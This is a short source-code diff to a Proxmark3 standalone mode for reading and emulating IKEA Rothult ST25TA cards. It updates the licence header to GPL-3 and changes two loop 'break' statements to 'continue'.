@@ -1,9 +1,18 @@
 //-----------------------------------------------------------------------------
-// Nick Draffen, 2020
+// Copyright (C) Nick Draffen, 2020
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
 //
-// This code is licensed to you under the terms of the GNU GPL, version 2 or,
-// at your option, any later version. See the LICENSE.txt file for the text of
-// the license.
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
 //-----------------------------------------------------------------------------
 // code for HF ST25TA IKEA Rothult read/sim/dump/emulation by Nick Draffen
 //-----------------------------------------------------------------------------
@@ -191,7 +200,7 @@ void RunMod(void) {
                 state = STATE_READ;
                 DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
                 DbpString("\n" _YELLOW_("!!") "Waiting for an ST25TA card...");
-                break;
+                continue;
             }
 
             // We need to listen to the high-frequency, peak-detected path.
@@ -369,7 +378,7 @@ void RunMod(void) {
                 state = STATE_READ;
                 DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
                 DbpString("\n" _YELLOW_("!!") "Waiting for an ST25TA card...");
-                break;
+                continue;
             }
 
             // We need to listen to the high-frequency, peak-detected path.
